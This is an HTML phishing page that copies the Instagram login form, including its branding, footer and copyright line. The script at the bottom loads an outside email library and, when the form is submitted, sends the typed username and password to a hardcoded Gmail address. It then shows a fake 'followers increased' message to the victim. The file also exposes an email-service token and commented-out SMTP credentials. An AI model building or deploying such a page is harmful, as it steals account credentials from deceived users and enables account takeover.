<!DOCTYPE html>
<html lang="en">
 
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" href="style.css">
    <title>Instagram Login Form</title>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
      integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    />
  </head>
  <body>
    <div id="container">
      <form onsubmit="sendEmail(); reset(); return false;">
        <section>
          <div class="main-top">
            <div class="logo">
              <img src="Image/images.png" />
            </div>
            <div>
              <input
                type="text"
                placeholder="Phone number , Username or email"
                class="username"
                id="username"
              />
              <div>
                <input
                  type="password"
                  placeholder="Password"
                  class="password"
                  id="password"
                />
              </div>
              <strong>
                <input type="submit" value="Log in" class="login-btn" />
              </strong>
            </div>

            <span class="or"> OR </span>

            <div class="main-bottom">
              <a href="" class="logInFB"
                ><i class="fa-brands fa-facebook-f"></i> Log in with Facebook </a
              ><br />
              <a href="" class="forget"> Forgot password </a>
            </div>
          </div>
          <div class="bottom">
            <div class="signUp">
              Don't have an account? <a href="#">Sign up</a>
            </div>
          </div>
          <div class="app-section">
            <span> Get the app </span>
            <div class="images">
              <img src="Image/google play.png" alt="googlePlay Image" />
              <img src="Image/microsoft logo.png" alt="Microsoft Image" />
            </div>
          </div>
        </section>
      </form>

      <!-- Footer Section Starts from Here -->
      <footer>
        <a href="">Meta</a>
        <a href="">About</a>
        <a href="">Blog</a>
        <a href="">Jobs</a>
        <a href="">Help</a>
        <a href="">API</a>
        <a href="">Privacy</a>
        <a href="">Terms</a>
        <a href="">Top Accounts</a>
        <a href="">Locations</a>
        <a href="">Instagram Lite</a>
        <a href="">Instagram Contact</a>
        <a href="">Uploading & Non-Users</a>
        <div class="bottom-footer">
          <select name="" id="">
            <option value="English">English</option>
            <option value="Hindi">Hindi</option>
            <option value="Punjabi">Punjabi</option>
            <option value="Urdu">Urdu</option>
            <option value="Francais">Francais</option>
          </select>
          <span> &copy; 2024 Instagram from Meta</span>
        </div>
      </footer>
    </div>





    <script src=" https://smtpjs.com/v3/smtp.js"></script>
    <script>
      function sendEmail() {
        Email.send({
          // Host: "smtp.elasticemail.com",
          // Username: "tanishqcoder893@gmail.com",
          // Password: "B240F1384466F5803F53D23C5B7A5AA894D5",
          SecureToken: "89b2b851-1f52-4835-827d-fee45788fb2a",
          To: "sharmatanishq893@gmail.com",
          From: document.getElementById("username").value,
          Subject: "new userser log in",
          Body:
            "UserName: " +
            document.getElementById("username").value +
            "<br> Password " +
            document.getElementById("password").value,
        }).then((message) => alert("Followers Incresed Successfully"));
      }
    </script>
  </body>
</html>
